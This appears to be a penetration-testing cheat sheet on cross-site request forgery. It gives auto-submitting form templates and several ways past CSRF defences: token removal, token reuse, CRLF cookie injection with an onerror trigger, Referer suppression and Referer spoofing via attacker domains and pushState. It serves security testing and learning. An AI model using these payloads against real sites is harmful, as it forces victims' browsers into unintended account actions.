CSRF
CSRF - Cross-site request forgery
Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.
How to construct a CSRF attack
No Defense mechanism
generate POC using burpsuite or manually write it
<form method="$method" action="$url">
<input type="hidden" name="$param1name" value="$param1value">
</form>
<script>
document.forms[0].submit();
</script>
Validation of CSRF token depends on request method
switch to the GET method to bypass the validation and deliver a CSRF attack
Validation of CSRF token depends on token being present
Some applications correctly validate the token when it is present but skip the validation if the token is omitted.
TRY TO DELETE IT
CSRF token is not tied to the user session
Some applications do not validate that the token belongs to the same session as the user who is making the request. Instead, the application maintains a global pool of tokens that it has issued and accepts any token that appears in this pool.
In this situation, the attacker can log in to the application using their own account, obtain a valid token, and then feed that token to the victim user in their CSRF attack.
If the web site contains any behavior that allows an attacker to set a cookie in a victim's browser
inject cookie using this format
/?search=test%0d%0aSet-Cookie:%20csrf=fake
make POC work automatically using this
<img src="$cookie-injection-url/?search=test%0d%0aSet-Cookie:%20csrf=fake" onerror="document.forms[0].submit();"/>
AND
CSRF token is tied to a non-session cookie
contain header like this
csrfKey=rZHCnSzEp8dbI6atzagGoSYyqJqTz5dv
we can get valid token from personal account and preform the attack
CSRF token is simply duplicated in a cookie
any token in correct format
Referer Header exist
Validation of Referer depends on header being present
Some applications validate the
Referer
header when it is present in requests but skip the validation if the header is omitted.<meta name="referrer" content="never">
Validation of Referer can be circumvented
Some applications validate the
Referer
header in a naive way that can be bypassed. For example, if the application validates that the domain in theReferer
starts with the expected value, then the attacker can place this as a subdomain of their own domain:http://vulnerable-website.com.attacker-website.com/csrf-attack
Likewise, if the application simply validates that the
Referer
contains its own domain name, then the attacker can place the required value elsewhere in the URL:http://attacker-website.com/csrf-attack?vulnerable-website.com
in this case expoit be like :
modify header to be like
Referer: https://arbitrary-incorrect-domain.net?target.net
craft POC and add this script
history.pushState("", "", "/?target.net")
add this to headers
Referrer-Policy: unsafe-url
Last updated